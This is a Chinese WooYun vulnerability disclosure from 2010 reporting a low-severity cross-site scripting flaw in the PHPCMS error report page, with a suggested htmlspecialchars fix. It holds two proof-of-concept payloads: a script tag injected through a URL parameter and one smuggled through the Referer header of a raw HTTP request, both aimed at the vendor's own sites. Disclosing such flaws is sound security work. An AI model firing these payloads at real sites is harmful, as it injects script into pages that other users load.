当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2010-0119

漏洞标题:PHPCMS全系列某页面跨站脚本漏洞

相关厂商:PHPCMS

漏洞作者: CnCxzSec(衰仔)

提交时间:2010-07-27 15:04

修复时间:2010-07-27 15:04

公开时间:2010-07-27 15:04

漏洞类型:xss跨站脚本攻击

危害等级:低

自评Rank:5

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2010-07-27: 积极联系厂商并且等待厂商认领中,细节不对外公开
2010-07-27: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

PHPCMS全系列某页面跨站脚本漏洞

详细说明:

PHPCMS全系列错误报告页面跨站脚本漏洞。
两种版本
1、官方demo页面为url xss.
2、官方主站的错误报告页面,$info['error_link']去自referer,更改referer即可插入任意代码。
危害不大,漏洞等级,低。

漏洞证明:

POC1:http://demo.phpcms.cn/error_report/error_report.php?title=1&contentid=1"><script>alert(/xss/)</script><"
POC2:

GET /error_report/error_report.php?title=1 HTTP/1.1
Host: www.phpcms.cn
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: PHPSESSID=4ko75j2uund85mqgerk0fpup67
Referer: "><script>alert(/xss/)</script><"

修复方案:

error_report.php

$info['error_link'] = htmlspecialchars($info['error_link']);


版权声明:转载请注明来源 CnCxzSec(衰仔)@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:3 (WooYun评价)